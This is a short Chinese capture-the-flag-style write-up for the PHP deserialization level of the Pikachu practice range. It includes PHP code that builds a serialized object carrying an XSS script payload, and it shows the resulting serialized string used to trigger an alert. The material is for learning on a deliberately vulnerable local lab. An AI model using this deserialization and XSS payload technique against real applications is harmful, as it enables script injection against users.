pikachu靶场-PHP反序列化 – 作者:知非知非知非

1627518061_6101f46d83a9285b975f0.png!small

1627518066_6101f4726d8a8250a056d.png!small

1627518072_6101f478097abf64fd808.png!small

这是一个接受序列化数据的API:

序列化的过程 是把一个对象变成可以传输的字符串

所以这个接受序列化数据的API实际上就是对序列化数据库进行反序列化的一个接口!!!

看了大佬的WP:这个漏洞只能通过查看服务器后端的代码代码得出:

1627518086_6101f486143cbe232d186.png!small

通过查看源代码:正好满足反序列化漏洞的利用原理!!!

1、反序列化的内容是用户可以控制的

2、后台不正当的使用了PHP的中魔法函数(__construct()当一个对象创建时被调用)

接下来进行构造攻击源码:

<?php

class S{

var $test = “<script>alert(‘xss’)</script>”;

}

echo ‘<br>’;

$a = new S();

echo serialize($a);

?>

通过以下方法访问:

view-source:http://localhost/pikachu/2.php

1627518123_6101f4ab03fe1e140be3a.png!small

拷贝出去放入框内:

O:1:”S”:1:{s:4:”test”;s:29:”<script>alert(‘xss’)</script>”;}

弹出了!!!

1627518136_6101f4b82c2cc548d78dd.png!small

来源:freebuf.com 2021-07-29 08:23:18 by: 知非知非知非

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论